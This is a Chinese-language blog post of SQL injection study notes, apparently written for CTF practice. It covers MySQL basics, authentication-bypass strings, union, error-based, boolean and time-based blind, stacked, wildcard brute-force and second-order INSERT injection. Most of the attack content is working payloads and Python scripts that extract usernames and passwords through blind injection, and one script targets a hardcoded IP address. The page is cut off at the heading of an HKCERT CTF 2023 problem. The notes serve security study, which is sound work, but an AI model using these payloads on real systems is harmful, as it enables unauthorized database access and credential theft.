

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/gc.jpg">
  <link rel="icon" href="/img/gc.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="fru1ts">
  <meta name="keywords" content="fru1ts">
  
    <meta name="description" content="基础  SQL 注入是一种将 SQL 代码插入或添加到应用（用户）的输入参数中，之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。 攻击者能够修改 SQL 语句，该进程将与执行命令的组件（如数据库服务器、应用服务器或 WEB 服务器）拥有相同的权限。 如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询（该查询在数据库服务器">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="https://fru1ts.github.io/2023/01/31/SQL%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="fru1ts&#39; Blog">
<meta property="og:description" content="基础  SQL 注入是一种将 SQL 代码插入或添加到应用（用户）的输入参数中，之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。 攻击者能够修改 SQL 语句，该进程将与执行命令的组件（如数据库服务器、应用服务器或 WEB 服务器）拥有相同的权限。 如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询（该查询在数据库服务器">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://fru1ts.github.io/2023/01/31/SQL%E6%B3%A8%E5%85%A5/1.jpg">
<meta property="og:image" content="https://fru1ts.github.io/2023/01/31/SQL%E6%B3%A8%E5%85%A5/2.jpg">
<meta property="article:published_time" content="2023-01-31T10:43:37.000Z">
<meta property="article:modified_time" content="2024-09-27T11:57:05.426Z">
<meta property="article:author" content="fru1ts">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://fru1ts.github.io/2023/01/31/SQL%E6%B3%A8%E5%85%A5/1.jpg">
  
  
  
  <title>SQL注入 - fru1ts&#39; Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/KaTeX/0.16.2/katex.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/mouse.css">
<link rel="stylesheet" href="/css/scroll.css">
<link rel="stylesheet" href="/css/macpanel.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"fru1ts.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"WEdmoCOkNdSUMsONpu72ngCo-gzGzoHsz","app_key":"PSBkctB8cKrR97yZLNXnJ0nj","server_url":"https://wedmocok.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  
    
  



  
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/katex@0.11.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>fru1ts&#39; Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="SQL注入"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-01-31 10:43" pubdate>
          January 31, 2023 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          12k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          103 mins
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> views
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">SQL注入</h1>
            
              <p class="note note-info">
                
                  
                    Last updated on September 27, 2024 am
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="基础"><a class="markdownIt-Anchor" href="#基础"></a> 基础</h1>
<ul>
<li>SQL 注入是一种将 SQL 代码插入或添加到应用（用户）的输入参数中，之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。</li>
<li>攻击者能够修改 SQL 语句，该进程将与执行命令的组件（如数据库服务器、应用服务器或 WEB 服务器）拥有相同的权限。</li>
<li>如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询（该查询在数据库服务器上执行）之前已经对其进行过验证，通常就会出现 SQL 注入漏洞。</li>
</ul>
<h3 id="mysql数据库"><a class="markdownIt-Anchor" href="#mysql数据库"></a> mysql数据库</h3>
<p>cmd连接数据库：</p>
<ol>
<li>配置好环境变量</li>
<li>登录：mysql -u用户名 –p</li>
</ol>
<p>几个常用命令：</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">展示数据库中包含的全部库：<span class="hljs-keyword">show</span> databases;<br>展示库中的所有表：<span class="hljs-keyword">show</span> <span class="hljs-keyword">tables</span>;<br>展示表的字段结构：<span class="hljs-keyword">show</span> <span class="hljs-keyword">columns</span> <span class="hljs-keyword">from</span> 表名;  或者：<span class="hljs-keyword">desc</span> 表名;<br>查询表中的数据：<span class="hljs-keyword">select</span> 列名<span class="hljs-number">1</span>,列名<span class="hljs-number">2</span>,列名<span class="hljs-number">3</span>……. <span class="hljs-keyword">from</span> 表名 <br>% 匹配任意字符<br>_ 匹配单个字符<br></code></pre></td></tr></table></figure>
<p>数据库结构：库-&gt;表-&gt;列-&gt;行</p>
<img src="/2023/01/31/SQL%E6%B3%A8%E5%85%A5/1.jpg" srcset="/img/loading.gif" lazyload class="">
<h3 id="sql注入点挖掘"><a class="markdownIt-Anchor" href="#sql注入点挖掘"></a> SQL注入点挖掘</h3>
<p>登录界面或者查询框先尝试万能密码： a’ or ‘1’=’1或者 admin’-- (注释符) 或者‘^0# 或者*,1</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs livescript">有回显<br>联合查询 -&gt;构造联合查询语句  <br>报错注入 -&gt;构造报错语句<br>堆查询   -&gt;多行语句执行<br><br>无回显        <br>盲注   -&gt;布尔型/时间型 通过某种手段“爆破”结果<br><br>整形注入：<br>当输入的参数为整形时，如果存在注入漏洞，可以认为是数字型注入。<br>测试方法：(<span class="hljs-number">1</span>)加引号报错（单引号没报错的话，尝试双引号）（<span class="hljs-number">2</span>）加注释符还是报错<br><br>字符型注入:(单引号没报错尝试双引号)<br>www.xxx.com/ccc.php?id=<span class="hljs-number">1</span>’ <span class="hljs-keyword">and</span> ‘<span class="hljs-number">1</span>’=<span class="hljs-string">&#x27;1</span><br><span class="hljs-string">页面正常，继续下一步</span><br><span class="hljs-string">www.xxx.com/ccc.php?id=1’ and ‘1’=&#x27;</span><span class="hljs-number">2</span><br>页面报错，则说明存在字符型注入。<br><br><br><span class="hljs-comment">## 被过滤时可以用fuzz测试过滤内容</span><br></code></pre></td></tr></table></figure>
<h2 id="一次注入"><a class="markdownIt-Anchor" href="#一次注入"></a> 一次注入</h2>
<h3 id="联合注入"><a class="markdownIt-Anchor" href="#联合注入"></a> 联合注入</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs mysql">payload:<br>1.判断数字型注入还是字符型注入 <br>2.测试字段个数 <br>1&#x27; order by 3 #;  （回显正常）即执行： SELECT id,user,password FROM sql_bug WHERE id = &#x27; 1 &#x27; order by 3 #&#x27; limit 1<br>1&#x27; order by 4 #;  （回显错误）即执行： SELECT id,user,password FROM sql_bug WHERE id = &#x27; 1 &#x27; order by 4 #&#x27; limit 1<br>3.爆出库名 union select 1,2,database() #<br>有时候需要查看其他数据库名<br>0 union select 1,group_concat(schema_name) from information_schema.schemata#<br>4.爆出表名 <br>union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() # <br>5.爆出字段名 <br>union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’’ # <br>6.查询最终的数据 union select group_concat(字段名)from 表名<br></code></pre></td></tr></table></figure>
<h3 id="报错型注入"><a class="markdownIt-Anchor" href="#报错型注入"></a> 报错型注入</h3>
<p>（一般在没法用联合查询时才用）</p>
<h4 id="extractvaule报错"><a class="markdownIt-Anchor" href="#extractvaule报错"></a> ExtractVaule报错</h4>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs less">正确形式：<span class="hljs-selector-tag">extractvalue</span>(XML_document,Xpath_string)<br>报错注入： <span class="hljs-selector-tag">and</span> <span class="hljs-selector-tag">extractvalue</span>(<span class="hljs-number">1</span>,payload) <br>例：<span class="hljs-selector-tag">and</span> <span class="hljs-selector-tag">extractvalue</span>(<span class="hljs-number">1</span>,<span class="hljs-built_in">concat</span>(<span class="hljs-number">0</span>x7e,(select <span class="hljs-variable">@@version</span>),<span class="hljs-number">0</span>x7e))     <span class="hljs-comment">//至于是and还是or，需要让这个报错语句能够被执行</span><br><span class="hljs-selector-tag">extractvalue</span>函数每一次只能显示<span class="hljs-number">32</span>位字符， 所以我们需要使用<span class="hljs-selector-tag">left</span>和<span class="hljs-selector-tag">right</span>函数分两次将<span class="hljs-selector-tag">flag</span>左边的内容和右边的内容显示出来，默认从左边取，<br>取右边：<span class="hljs-selector-tag">extractvalue</span>(<span class="hljs-number">1</span>,<span class="hljs-built_in">concat</span>(<span class="hljs-number">0</span>x7e,select <span class="hljs-built_in">group_concat</span>(<span class="hljs-built_in">right</span>(password,<span class="hljs-number">30</span>))from))<br></code></pre></td></tr></table></figure>
<h4 id="updatexml-报错"><a class="markdownIt-Anchor" href="#updatexml-报错"></a> updateXML 报错</h4>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs less"><span class="hljs-selector-tag">updateXML</span> 报错<br>正确形式：<span class="hljs-selector-tag">updatexml</span>（<span class="hljs-selector-tag">XML_document</span>,<span class="hljs-selector-tag">XPath_string</span>,<span class="hljs-selector-tag">new_value</span>）<br>报错注入： <span class="hljs-selector-tag">and</span> <span class="hljs-selector-tag">updatexml</span>(<span class="hljs-number">1</span>,payload,<span class="hljs-number">1</span>) 例：<span class="hljs-selector-tag">updatexml</span>(<span class="hljs-number">1</span>,<span class="hljs-built_in">concat</span>(<span class="hljs-number">0</span>x7e,(select <span class="hljs-variable">@@version</span>),<span class="hljs-number">0</span>x7e),<span class="hljs-number">1</span> )<br>在<span class="hljs-selector-tag">ASCII</span>码表中，<span class="hljs-number">0</span><span class="hljs-selector-tag">x7e</span>这个十六进制数代表符号~，~这个符号在<span class="hljs-selector-tag">xpath</span>语法中是不存在的，因此总能报错<br></code></pre></td></tr></table></figure>
<h3 id="盲注"><a class="markdownIt-Anchor" href="#盲注"></a> 盲注</h3>
<p>（只回显正确错误或者不会报错具体内容）</p>
<h4 id="布尔型注入"><a class="markdownIt-Anchor" href="#布尔型注入"></a> 布尔型注入</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs mysql">?id=1’and 1=1 /and 1=2 尝试后页面有变化 <br>确定数据库长度：?Id=1’ and length((database()))=8 --+<br>确定数据库名称：?id=1’ and ascii(substring(database(),1,1))=115--+<br>确定表的个数：?id=1’ and length(((select concat_ws(0x7e,table_name) from%20information_schema.tables where table_schema=database() limit 4,1)))&gt;1--+<br>确定每个表的长度：?id=1’ and length(((select concat_ws(0x7e,table_name) from information_schema.tables where table_schema=database() limit 0,1)))=6--+<br>确定每个表达名称：?id=1’ and ascii(substring((select concat_ws(0x7e,table_name) from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+<br>确定每一列的长度：?id=1&#x27; and length(((select concat_ws(0x7e,column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27; limit 0,1)))=2--+<br>确定每一列的名称：?id=1&#x27; and ascii(substring((select concat_ws(0x7e,column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27; limit 0,1),1,1)) =105--+<br>确定数据：?id=1&#x27; and ascii(substring((select concat_ws(0x7e,username,password) from users limit 0,1),1,1)) =68--+<br></code></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&#x27;http://61.147.171.105:53758/view.php?no=&#x27;</span><br><br>flag = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">50</span>):<br>    <span class="hljs-built_in">min</span> = <span class="hljs-number">32</span><br>    <span class="hljs-built_in">max</span> = <span class="hljs-number">127</span><br>    <span class="hljs-keyword">while</span> <span class="hljs-built_in">min</span> &lt; <span class="hljs-built_in">max</span>:<br>        mid = (<span class="hljs-built_in">min</span> + <span class="hljs-built_in">max</span>) // <span class="hljs-number">2</span><br>        payload = <span class="hljs-string">f&quot;1 and ascii(substring((select group_concat(username,passwd) from users limit 0,1),<span class="hljs-subst">&#123;i&#125;</span>,1)) &gt;<span class="hljs-subst">&#123;mid&#125;</span>--+&quot;</span><br>        response = requests.get(url=url + payload)<br>        <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;admin&#x27;</span> <span class="hljs-keyword">in</span> response.text:<br>            <span class="hljs-built_in">min</span> = mid + <span class="hljs-number">1</span><br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">max</span> = mid<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">min</span> != <span class="hljs-number">32</span>:<br>        flag += <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">min</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">break</span><br>    <span class="hljs-built_in">print</span>(flag)<br><br></code></pre></td></tr></table></figure>
<h4 id="时间延时注入"><a class="markdownIt-Anchor" href="#时间延时注入"></a> 时间延时注入</h4>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs mysql">报错注入与布尔注入时无反应，可尝试基于时间的注入<br>sleep()参数写数字，此函数用于将时间延迟，参数的单位是秒<br>IF(SUBSTR(password,1,1)=1,BENCHMARK(100000,SHA1(1337)),0) #sleep过滤时可替换<br>if(expr1,expr2,expr3)若expr1为真则执行expr2，否则执行expr3	<br>根据真假的不同网站的返回时间进行注入，<br>?id=1 and sleep(10)--+<br>?id=1 &#x27;and sleep(10)--+<br>?id=1’ and if(ascii(left(database(),1))=115,sleep(5),1)--+<br>?id=1&#x27;and if(ascii(substring((select table_name from information_schema.tables where table_schema=&#x27;security&#x27;limit 0,1),1,1))&gt;0,sleep(2),1)--+<br>后面步骤同布尔盲注<br></code></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> time<br><br>url = <span class="hljs-string">&#x27;&#x27;</span><br><br>flag = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1</span>, <span class="hljs-number">50</span>):<br>    <span class="hljs-built_in">min</span> = <span class="hljs-number">32</span><br>    <span class="hljs-built_in">max</span> = <span class="hljs-number">127</span><br>    <span class="hljs-keyword">while</span> <span class="hljs-built_in">min</span> &lt; <span class="hljs-built_in">max</span>:<br>        mid = (<span class="hljs-built_in">min</span> + <span class="hljs-built_in">max</span>) // <span class="hljs-number">2</span><br>        <span class="hljs-comment"># payload = f&quot;-1/**/||if(ascii(substring((select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/5,1),&#123;i&#125;,1))&gt;&#123;mid&#125;,sleep(2),1)/**/%23&quot; #ctf</span><br>        <span class="hljs-comment"># payload=f&quot;-1/**/||if(ascii(substring((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/&#x27;ctf&#x27;/**/limit/**/0,1),&#123;i&#125;,1))&gt;&#123;mid&#125;,sleep(2),1)/**/%23&quot; #items</span><br>        <span class="hljs-comment"># payload=f&quot;-1/**/||if(ascii(substring((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/&#x27;items&#x27;/**/limit/**/3,1),&#123;i&#125;,1))&gt;&#123;mid&#125;,sleep(2),1)/**/%23&quot; # id,name,price</span><br>        payload=<span class="hljs-string">f&quot;-1/**/||if(ascii(substring((select/**/right(group_concat(name,price),46)/**/from/**/items),<span class="hljs-subst">&#123;i&#125;</span>,1))&gt;<span class="hljs-subst">&#123;mid&#125;</span>,sleep(2),1)/**/%23&quot;</span><br>        t1 = time.time()<br>        response = requests.get(url=url + payload)<br>        t2 = time.time()<br>        <span class="hljs-keyword">if</span> t2 - t1 &gt; <span class="hljs-number">2</span>:<br>            <span class="hljs-built_in">min</span> = mid + <span class="hljs-number">1</span><br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">max</span> = mid<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">min</span> != <span class="hljs-number">32</span>:<br>        flag += <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">min</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">break</span><br>    <span class="hljs-built_in">print</span>(flag)<br><br></code></pre></td></tr></table></figure>
<h3 id="堆叠注入"><a class="markdownIt-Anchor" href="#堆叠注入"></a> 堆叠注入</h3>
<p>（select 被过滤时考虑用show）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs mysql">Show databases;<br>Use 数据库名；show tables;<br>Show columns from 表名;<br>更改表名：alter table 旧表名 rename to 新表名         //在可回想部分表内容时，可以把要显示的表名修改成要有显示的表名<br>更改列名：alter table 表名 change 旧列名 新列名 新列名的数据类型<br> mysql除可使用select查询表中的数据，也可使用handler语句，这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不具备select语句的所有功能。它是mysql专用的语句，并没有包含到SQL标准中。<br>语法：//users处为表名<br>Handler users open;<br>Handler users read first;<br>Handler users read next;<br>Handler users close;<br></code></pre></td></tr></table></figure>
<h3 id="通配符攻击"><a class="markdownIt-Anchor" href="#通配符攻击"></a> 通配符攻击</h3>
<p>可以用来爆破</p>
<figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs n1ql"><span class="hljs-keyword">SELECT</span> <span class="hljs-keyword">password</span> <span class="hljs-keyword">FROM</span> users <span class="hljs-keyword">WHERE</span> username=<span class="hljs-string">&#x27;admin&#x27;</span> <span class="hljs-keyword">and</span> <span class="hljs-keyword">password</span>=<span class="hljs-string">&#x27;1&#x27;</span> <span class="hljs-keyword">or</span> <span class="hljs-keyword">password</span> =<span class="hljs-string">&#x27;flag%&#x27;</span>--+<span class="hljs-string">&#x27;</span><br><span class="hljs-string">alpha = string.hexdigits</span><br><span class="hljs-string">pswd = &#x27;</span><span class="hljs-string">&#x27;</span><br><span class="hljs-string"></span><br><span class="hljs-string">while True:</span><br><span class="hljs-string">    flag = True</span><br><span class="hljs-string">    for i in alpha:</span><br><span class="hljs-string">        post_data = &#123;&quot;username&quot;: &quot;admin&quot;,</span><br><span class="hljs-string">                     &quot;password&quot;: f&quot;1&#x27;</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">or</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">password</span><span class="hljs-comment">/**/</span><span class="hljs-keyword">like</span><span class="hljs-comment">/**/</span><span class="hljs-string">&#x27;&#123;pswd + i&#125;%&#x27;</span>#<span class="hljs-string">&quot;&#125;</span><br><span class="hljs-string">        response = requests.post(url, data=post_data)</span><br><span class="hljs-string">        time.sleep(0.1)</span><br><span class="hljs-string">        if &quot;</span>something<span class="hljs-string">&quot; not in response.text:</span><br><span class="hljs-string">            pswd += i</span><br><span class="hljs-string">            print(pswd)</span><br><span class="hljs-string">            flag = False</span><br><span class="hljs-string">            break</span><br><span class="hljs-string"></span><br><span class="hljs-string">    if flag:</span><br><span class="hljs-string">        break</span><br></code></pre></td></tr></table></figure>
<h2 id="二次注入"><a class="markdownIt-Anchor" href="#二次注入"></a> 二次注入</h2>
<p>二次注入需要先把注入的语句写入数据库，等下一次查询到该语句是再的新的语句构成注入</p>
<p>一般注入点在有写入数据库的位置，注入的东西要结合查询语句去构造</p>
<h3 id="insert-into-注入"><a class="markdownIt-Anchor" href="#insert-into-注入"></a> INSERT INTO 注入</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">INSERT INTO users (username,password) values (&#x27;%s&#x27;, &#x27;%s&#x27;)&quot;, $_POST[&quot;username&quot;], $_POST[&quot;password&quot;]<br></code></pre></td></tr></table></figure>
<p>由于输入的数据直接拼接到mysql语句中，并且没有做过滤，就会导致恶意sql语句注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs payload">username=abc&#x27;,HEX(SUBSTR((SELECT password FROM (SELECT * FROM users)tmp WHERE username=&#x27;admin&#x27;),1,1)))-- &amp;password=1<br></code></pre></td></tr></table></figure>
<p>注意：要有引号闭合，最后要多一个<code>)</code>闭合，注释符:<code>-- </code>,因为对大小写不敏感，所以用hex编码来区分</p>
<p>将要查找的值读完存起来，再想方法把值读出来</p>
<h3 id="order-by-爆破密码"><a class="markdownIt-Anchor" href="#order-by-爆破密码"></a> ORDER BY 爆破密码</h3>
<p>看一道HKCERT CTF2023 的题目</p>
